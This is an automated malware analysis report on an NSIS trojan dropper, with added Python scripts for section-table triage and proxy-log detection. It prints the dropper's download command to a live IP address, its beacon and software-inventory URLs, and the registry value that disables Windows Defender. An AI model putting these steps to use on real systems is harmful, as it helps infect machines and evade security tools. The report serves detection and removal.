Dropped.Application.Generic.1683936_acf71053f8
Susp_Dropper (Kaspersky), Dropped:Application.Generic.1683936 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: acf71053f845d276d7acfc233fd3cb6f
SHA1: a871b602f3dde9e3e7d81f8bc97680e2cb6023b4
SHA256: 6bb95f9b27f744a61e84ccfddd0a1658be0703a1e524730a0a23ce95ffc47b4f
SSDeep: 3072:GgXdZt9P6D3XJXCBXCCZJMItOdoewR3kHhhDfrsHXTXQhr:Ge340B5ZJMCOdVwsxfrsHXTAhr
Size: 144931 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Mail.Ru
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Behaviour observed in this analysis (every detail below is taken from the sections that follow):
- The sample is a Nullsoft (NSIS) 2.46 installer: the embedded manifest names Nullsoft.NSIS.exehead, the strings reference nsis.sf.net and ~nsu.tmp, and the .ndata section with a raw size of 0 is the NSIS data area. The manifest requests requestedExecutionLevel requireAdministrator, so the installer runs elevated after a UAC prompt; that is what allows it to write under HKLM and %Program Files% and to delete files under %windir%\System32\Tasks.
- "Entropy: Packed" and PEID "UPolyXv05_v6" should not be read as a custom packer: the .text section has an entropy of only 4.46, the manifest and import names are visible in clear, and the compressed installer payload sits in the overlay after the last section (the five sections account for 32768 raw bytes of a 144931-byte file). NSIS installers routinely match that PEiD signature.
- The PE header timestamp (2009-12-06) predates Flash Player 23 (2016), whose Flash32_23_0_0_185.ocx the strings reference, so the compile time is not trustworthy.
- It writes several downloader executables (ddnow.exe, ddnow4.exe, dnow.exe, dnow4.exe, tinstall.exe, tinstall4.exe) to %LOCALAPPDATA% and extracts SimpleFC.dll, the NSIS firewall-control plugin (exports AddPort, RemovePort, IsPortAdded, IsPortEnabled, EnableDisablePort; uses the HNetCfg.FwMgr COM object), into a temporary directory. ddnow.exe is started as ddnow.exe "<url>" "OK" "<output file>" (see the strings) and retrieves hxxp://162.222.193.23/newc4nT.php; setup200.exe is fetched from the same host (the Suricata ET POLICY alert for a PE download corresponds to that request). ddnow.exe:1636 writes setupok.exe, which installs the "Applica" component.
- Install progress is reported to hxxp://162.222.193.23/run1.php?a=flash&b=... (values 111, rand, "setupok.exe - 61844", "... - 1", "... - 1 - ready"); goet1.php and soid1.php carry a dotnet=yes flag and a numeric aaaip parameter. The ehka.php request to www.rosalesscholarly.pw sends the Windows edition and the names of the HKLM\SOFTWARE subkeys (RegEnumKeyA is imported), i.e. an installed-software inventory; in this run the list includes "VMware, Inc." and "WinPcap", which also fingerprints the analysis environment.
- The strings reference the InprocServer32 key of CLSID {D27CDB6E-AE6D-11cf-96B8-444553540000} (the Shockwave Flash ActiveX control) and %windir%\system32\Macromed\Flash\Flash32_23_0_0_185.ocx, i.e. the sample locates the installed Flash Player control; the a=flash beacon parameter matches.
- Defence evasion: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = 1 (the Group Policy value, which overrides the user-facing setting), and tinstall.exe deletes the Adobe Flash Player Updater, GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA task files from %windir%\System32\Tasks.
- Persistence: "Applica" (publisher "Dotdo") is installed to %Program Files%\applica with an Add/Remove Programs entry and an "Applica" value in both the HKLM and the HKCU Run key; applica.exe is also the process into which code is injected.
- The HKLM\SOFTWARE\Microsoft\Tracing\<name>_RASAPI32 and _RASMANCS keys are created by Windows itself when a process loads the RAS/WinInet tracing machinery; they show that ddnow.exe and tinstall.exe used those network APIs but are not settings the malware chose.
- The byte counts in parentheses in the file lists are the analysis system's figures: setupok.exe is shown as 61 bytes while the beacon reports 61844, so do not use them as file sizes.
Payload
No specific payload has been found.
Process activity
The Dropped creates the following process(es):
setupok.exe:2896
%original file name%.exe:3752
ddnow.exe:2308
ddnow.exe:2100
ddnow.exe:1636
ddnow.exe:2212
ddnow.exe:4048
ddnow.exe:2748
ddnow.exe:804
ddnow.exe:2264
ddnow.exe:2360
tinstall.exe:4036
The Dropped injects its code into the following process(es):
applica.exe:1392
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setupok.exe:2896 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)
The Dropped deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2FD6.tmp (0 bytes)
The process %original file name%.exe:3752 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
The Dropped deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz5D5B.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\icka16591708.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\16591708.txt (0 bytes)
The process ddnow.exe:2308 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
The process ddnow.exe:2100 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:1636 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
The process ddnow.exe:2212 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2748 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:804 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2264 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2360 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process tinstall.exe:4036 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
The Dropped deletes the following file(s):
C:\Windows\System32\Tasks\Adobe Flash Player Updater (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA (0 bytes)
Registry activity
The process setupok.exe:2896 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"DisplayName" = "Applica"
"Publisher" = "Dotdo"
[HKLM\SOFTWARE\idot]
"idot" = "ok"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"UninstallString" = "%Program Files%\Applica\uninstall.exe"
To run on every boot, the Dropped adds the following values, pointing to the dropped applica.exe rather than to the original file, to both the machine-wide and the current-user autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
The process %original file name%.exe:3752 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
The process ddnow.exe:2308 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
The process ddnow.exe:4048 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
The process tinstall.exe:4036 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
Dropped PE files
| MD5 | File path |
|---|---|
| b528db49e0768a9591d6ef902b67416a | c:\Program Files\applica\applica.exe |
| fe1e3670cdc51a0ad694683c98a8c22c | c:\Program Files\applica\uninstall.exe |
| d38543fc9ae37d188a23e06ee11d3504 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp\SimpleFC.dll |
| c5dbd61013cf8146a00f826baee93072 | c:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe |
| a3d027a0f8a46f9adb96ab598d02e494 | c:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe |
| 662c45356fcc64b55f8938e284d0c0d0 | c:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe |
| 113d1d7b8a9039e6e63034284e35cc99 | c:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe |
| 008afd62201f96d10b0b748e2779274d | c:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe |
| 4a8acafc1fca3c19dcf38c7b95129036 | c:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe |
| a5123d7682bfa3f0cbd9fa86ccc7f47a | c:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 94208 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 286720 | 2536 | 2560 | 3.13045 | 8c712c343be341f0c008fe547f2adcd2 |
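The section table is what the "Entropy: Packed" and PEID verdicts in the header rest on, so it is worth checking it the way an analyst would. The script below is an added example, not part of the Lavasoft report: the SECTIONS rows and FILE_SIZE are copied from the table and header above, while the entropy and virtual/raw thresholds and the header-size allowance used for the overlay estimate are assumptions (the table gives no raw pointers). It flags the zero-raw-size .ndata section, the BSS-heavy .data section and the low-entropy .text section, and shows that roughly three quarters of the file is overlay, which for an NSIS installer is where the compressed payload lives.

```python
"""Packer indicators from the PE section table above.

Added example; not part of the Lavasoft report. SECTIONS and FILE_SIZE are
copied from the report. The thresholds are analyst rules of thumb
(assumptions), and MAX_HEADERS is an assumption because the table gives
no raw pointers.
"""
import math
from collections import Counter
from typing import Dict, List, Tuple

Section = Tuple[str, int, int, int, float]   # name, virtual addr, virtual size, raw size, entropy

SECTIONS: List[Section] = [
    (".text",  4096,   23628,  24064, 4.46394),
    (".rdata", 28672,  4764,   5120,  3.4982),
    (".data",  36864,  154712, 1024,  3.3278),
    (".ndata", 192512, 94208,  0,     0.0),
    (".rsrc",  286720, 2536,   2560,  3.13045),
]
FILE_SIZE = 144931          # "Size: 144931 bytes" in the report header
HIGH_ENTROPY = 7.0          # assumption: >= 7 bits/byte reads as compressed/encrypted
LOW_CODE_ENTROPY = 6.0      # assumption: plain x86 code sits around 5-6.5 bits/byte
BSS_RATIO = 8.0             # assumption: virtual/raw above this is mostly uninitialised data
MAX_HEADERS = 4096          # assumption: DOS/PE/section headers occupy at most one page


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0.0..8.0; what the report's per-section 'Entropy' column measures."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_flags(sec: Section) -> List[str]:
    name, _vaddr, vsize, rsize, entropy = sec
    flags = []
    if rsize == 0:
        flags.append("no raw data: uninitialised section (NSIS keeps installer state in .ndata)")
    elif vsize / rsize > BSS_RATIO:
        flags.append(f"virtual/raw ratio {vsize / rsize:.0f}: mostly BSS, not a runtime-unpacked image")
    if entropy >= HIGH_ENTROPY:
        flags.append("high entropy: compressed or encrypted content")
    if name == ".text" and rsize and entropy < LOW_CODE_ENTROPY:
        flags.append("low-entropy code: plain compiled code, not a packer stub's encrypted body")
    return flags


def min_overlay_bytes(sections: List[Section], file_size: int) -> int:
    """Lower bound on data appended after the last section (where NSIS stores its payload)."""
    return max(0, file_size - sum(s[3] for s in sections) - MAX_HEADERS)


def assess(sections: List[Section], file_size: int) -> Dict[str, object]:
    flags = {s[0]: section_flags(s) for s in sections}
    overlay = min_overlay_bytes(sections, file_size)
    return {
        "flags": flags,
        "high_entropy_sections": [s[0] for s in sections if s[4] >= HIGH_ENTROPY],
        "overlay_min": overlay,
        "overlay_fraction": round(overlay / file_size, 2),
        "looks_like_nsis": any(s[0] == ".ndata" and s[3] == 0 for s in sections),
    }


if __name__ == "__main__":
    result = assess(SECTIONS, FILE_SIZE)
    for name, fl in result["flags"].items():
        print(name, "->", "; ".join(fl) or "nothing notable")
    print("high-entropy sections:", result["high_entropy_sections"])
    print(f"overlay: at least {result['overlay_min']} bytes ({result['overlay_fraction']:.0%} of the file)")
    print("NSIS layout:", result["looks_like_nsis"])
    print("entropy of 256 distinct bytes:", shannon_entropy(bytes(range(256))))
```

With the report's numbers no section reaches the 7-bit entropy mark and at least 108067 bytes lie past the sections, so the "Packed" verdict describes the overlay payload of an ordinary NSIS build, not a packed stub; to get at the dropped components, extract the NSIS archive rather than hunting for an OEP.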
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 360
2ad305eb2625cacef55c0e012e3162da
f17d83f93c68a4057a7d562626fab745
2171ff59892413c65994b6335007fb76
59c258e3888d0b4c02040dd649f60018
1f3d33e118bbeef358807c43a9ff02bf
6fae0efc37d2fbae20229d8ad9fea2d6
a9a691d86babf412bff5063a916d813c
db34845a89a44e13403497c06916949e
834f9a1ad76269c7a2f255b664a93f7a
4f810ac44ebcf38b781f6ffec908b30e
30dd59ea6b89831b1efb9ddd8cdf7c4b
2d60312dfc2613c1aa639be1068d9a5f
543be1971fe641023ca9b4e9a441f88c
affd91f1318160d33910095c59662ca6
15b151a60ee59281793c4592e8089e42
1afd38ad853ffd5744e9f8b809183717
03e67c5fd3d17208331cb10da2b41514
421ccf1fd130b0efa5a22a3c5e9e1745
0050d5a52818ce0f6a2ddafc727f4bf7
850ce9dc2931538f978c921b749d8d86
ded140d9ab8c0312c15813af59f60e54
1b0c8d430a3f14b68c9769400a4d9750
f0bd73a4df4b9bc951a6ec697e8cb185
0bcb89e2de30006d7d458e8c2e3e693d
650bd6f7182838930fab35a994703725
URLs
| URL | IP |
|---|---|
| hxxp://162.222.193.23/goet1.php?p=&pid=&all=&dotnet=yes | |
| hxxp://162.222.193.23/soid1.php?p=&aaaip=564810 | |
| hxxp://www.rosalesscholarly.pw/act/ehka.php?w=Windows7Ultimate&a=True&b=;7-Zip;ActiveState;Adobe;ATI Technologies;CBSTEST;Classes;Clients;Ghisler;Google;Intel;JavaSoft;JreMetrics;Macromedia;Microsoft;Mozilla;mozilla.org;MozillaPlugins;ODBC;Perl;Policies;RegisteredApplications;Sonic;ThinPrint;VMware, Inc.;WinPcap;WOW6432Node;Microsoft | |
| hxxp://162.222.193.23/run1.php?a=flash&b=111 | |
| hxxp://162.222.193.23/setup200.exe | |
| hxxp://162.222.193.23/run1.php?a=flash&b=rand | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 - 1 | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 - 1 - ready | |
| hxxp://162.222.193.23/newc4nT.php | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
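The URL table above is more useful as detection logic than as a list: the host, the run1.php?a=flash&b=... progress beacon, the PE download that fired the ET POLICY rule and the ehka.php software inventory each have a distinct shape. The script below is an added example, not part of the report or of the Emerging Threats ruleset: the indicator URLs are the report's (in their defanged hxxp:// form), the proxy log lines are constructed here in a simple "timestamp client method url status content-type bytes" layout, and ANALYSIS_ENV_NAMES is an assumption about which HKLM\SOFTWARE subkey names betray a sandbox. The PE-download check is the proxy-log approximation of the Suricata rule, which really inspects the response body for an MZ header.

```python
"""Proxy-log detection for the network indicators listed above (added example)."""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit, unquote_plus

IOC_URLS = [                     # from the report; query strings dropped where they vary per run
    "hxxp://162.222.193.23/goet1.php",
    "hxxp://162.222.193.23/soid1.php",
    "hxxp://www.rosalesscholarly.pw/act/ehka.php",
    "hxxp://162.222.193.23/run1.php",
    "hxxp://162.222.193.23/setup200.exe",
    "hxxp://162.222.193.23/newc4nT.php",
]
ANALYSIS_ENV_NAMES = {"VMware, Inc.", "WinPcap"}   # assumption: HKLM\SOFTWARE names that reveal a VM/sandbox
PE_CONTENT_TYPES = {"application/x-msdownload", "application/x-dosexec", "application/octet-stream"}


def refang(url: str) -> str:
    """hxxp:// (and hXXp://) back to http:// so urlsplit understands the scheme."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


IOC_HOSTS = {urlsplit(refang(u)).hostname for u in IOC_URLS}
IOC_PATHS = {(urlsplit(refang(u)).hostname, urlsplit(refang(u)).path) for u in IOC_URLS}


def query_params(url: str) -> Dict[str, str]:
    """Split only on '&'; the ehka.php inventory uses ';' inside a value, so parse_qs is avoided."""
    out = {}
    for part in urlsplit(url).query.split("&"):
        if part:
            key, _, val = part.partition("=")
            out[unquote_plus(key)] = unquote_plus(val)
    return out


def classify(url: str, content_type: str = "") -> List[str]:
    url = refang(url)
    u = urlsplit(url)
    params = query_params(url)
    labels = []
    if u.hostname in IOC_HOSTS:
        labels.append("ioc-host")
    if (u.hostname, u.path) in IOC_PATHS:
        labels.append("ioc-url")
    if u.path.endswith("/run1.php") and params.get("a") == "flash" and "b" in params:
        labels.append("status-beacon:" + params["b"])            # install-progress report
    if u.path.endswith("/ehka.php") and "b" in params:
        names = [n for n in params["b"].split(";") if n]          # HKLM\SOFTWARE subkey names
        labels.append(f"software-inventory:{len(names)} keys")
        leaked = sorted(ANALYSIS_ENV_NAMES.intersection(names))
        if leaked:
            labels.append("sandbox-fingerprint:" + ",".join(leaked))
    if content_type.lower() in PE_CONTENT_TYPES or u.path.lower().endswith((".exe", ".dll")):
        labels.append("pe-download")                              # log-side stand-in for the ET POLICY rule
    return labels


LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
                    r"(?P<status>\d{3}) (?P<ctype>\S+) (?P<bytes>\d+)$")


def scan(lines: List[str]) -> List[Tuple[str, str, str, List[str]]]:
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        labels = classify(m["url"], m["ctype"])
        if labels:
            alerts.append((m["ts"], m["client"], m["url"], labels))
    return alerts


SAMPLE_LOG = [   # constructed lines modelled on the report's URL table; not real traffic
    "2016-10-12T10:00:01Z 10.0.0.5 GET http://162.222.193.23/goet1.php?p=&pid=&all=&dotnet=yes 200 text/html 12",
    "2016-10-12T10:00:02Z 10.0.0.5 GET http://www.rosalesscholarly.pw/act/ehka.php?w=Windows7Ultimate&a=True"
    "&b=;7-Zip;Adobe;Google;Microsoft;VMware,%20Inc.;WinPcap;WOW6432Node 200 text/html 2",
    "2016-10-12T10:00:03Z 10.0.0.5 GET http://162.222.193.23/setup200.exe 200 application/x-msdownload 61844",
    "2016-10-12T10:00:04Z 10.0.0.5 GET http://162.222.193.23/run1.php?a=flash&b=setupok.exe%20-%2061844%20-%201%20-%20ready 200 text/html 2",
    "2016-10-12T10:00:05Z 10.0.0.7 GET http://www.example.com/index.html 200 text/html 5120",
]

if __name__ == "__main__":
    for ts, client, url, labels in scan(SAMPLE_LOG):
        print(ts, client, url, "->", ", ".join(labels))
```

The status-beacon label keeps the b= value, so the sequence "setupok.exe - 61844", "... - 1", "... - 1 - ready" from one client reconstructs how far the install got; the sandbox-fingerprint label is the reason a detonation of this sample on a bare VM may behave differently from a victim host.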
Traffic
The Dropped connects to the servers at the following location(s):
Strings from dumps:
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.193.23/newc4nT.php" "OK" "C:\Users\"%CurrentUserName%"\AppData\Local\icka16591708.txt"
s\"%CurrentUserName%"\AppData\Local\run1.txt"
276d7acfc233fd3cb6f.exe;0" "16591708.txt"
C:\Users\"%CurrentUserName%"\AppData\Local\icka16591708.txt
SimpleFC.dll
SID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32ers\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp\SimpleFC.dll
KWindows
HNetCfg.FwMgr
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
GetCPInfo
gdi32.dll
AddPort
EnableDisablePort
IsPortAdded
IsPortEnabled
RemovePort
hWEB
icka16591708.txt
5.ocx
ICKA16~1.TXT
rs\"%CurrentUserName%"\AppData\Local\setupok.exe
cf71053f845d276d7acfc233fd3cb6f.exe
\Windows\system32\Macromed\Flash\Flash32_23_0_0_185.ocx
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsz5D5B.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp
Windows
setupok.exe - 61844 - 1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>-Operation f
The strings that follow are German-language Borland/Delphi runtime-library exception messages (for example "Eigenschaft %s existiert nicht" = "Property %s does not exist", "Ungültige Variant-Operation" = "Invalid variant operation", "Zugriffsverletzung bei Adresse %p in Modul '%s'" = "Access violation at address %p in module '%s'"); several are cut where the string extractor dropped an umlaut. They show that at least one dropped component was built with a German-locale Delphi toolchain; they are library text, not attacker-authored content, and are kept as extracted:
Eigenschaft %s existiert nicht.
OLE-Fehler %.8xBDie Methode '%s' wird vom Automatisierungsobjekt nicht unterst
ge ($0%x)3Komponente mit der Bezeichnung %s existiert bereits/In der Stringliste sind Duplikate nicht erlaubt#Datei %s kann nicht erstellt werden#Datei %s kann nicht ge
ffnet werden(''%s'' ist kein gpft (%d)#Zu viele Eintr
ge in der Liste (%d)*Listenindex
berschreitet das Maximum (%d)BExpandieren des Speicher-Stream wegen Speichermangel nicht m
glich Fehler beim Lesen von %s%s%s: %s
%s.Seek nicht implementiert
r '%s' nicht gefunden&%s kann nicht zu %s zugewiesen werden
Klasse %s nicht gefunden
%s (%s, Zeile %d)
Abstrakter FehlerBZugriffsverletzung bei Adresse %p in Modul '%s'. %s von Adresse %p
Systemfehler. Code: %d.
%s:Ein Aufruf einer Betriebssystemfunktion ist fehlgeschlagen
ltige Variant-Operation#Ung
ltige Variant-Operation ($%.8x)
Variant ist kein ArrayBVariante des Typs (%s) konnte nicht in Typ (%s) konvertiert werdenF
berlauf bei der Konvertierung einer Variante vom Typ (%s) in Typ (%s)
ltiger Variant-Typ Operation wird nicht unterst
Externe Exception %x$Auswertung von assert fehlgeschlagen
ltige Zeigeroperation
ltige Typumwandlung4Zugriffsverletzung bei Adresse %p. %s von Adresse %p
Privilegierte Anweisung(Exception %s in Modul %s bei %p.
Anwendungsfehler7Format '%s' ung
r Format '%s'(Variant-Methodenaufruf nicht unterst
"'%s' ist kein g
ltiger Integerwert"'%s' ist kein g
E/A-Fehler %d
ltige Gleitkommaoperation
lash\Flash32_23_0_0_185.ocx
Remove it with Ad-Aware
- Click here to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setupok.exe:2896
%original file name%.exe:3752
ddnow.exe:2308
ddnow.exe:2100
ddnow.exe:1636
ddnow.exe:2212
ddnow.exe:4048
ddnow.exe:2748
ddnow.exe:804
ddnow.exe:2264
ddnow.exe:2360
tinstall.exe:4036
- Delete the original Dropped file.
- Delete or disinfect the following files created/modified by the Dropped:
%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
- Also undo the other registry changes listed under Registry activity, which the autorun list alone does not cover: delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender "DisableAntiSpyware" (or set it to 0) and confirm that Windows Defender starts again; delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica and HKLM\SOFTWARE\idot. The HKLM\SOFTWARE\Microsoft\Tracing\ddnow_* and tinstall_* keys are harmless Windows tracing settings and can be left or removed.
- The Adobe Flash Player Updater, GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA scheduled tasks were deleted by tinstall.exe; if those products are installed, repair or reinstall them so that their update tasks are recreated.
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
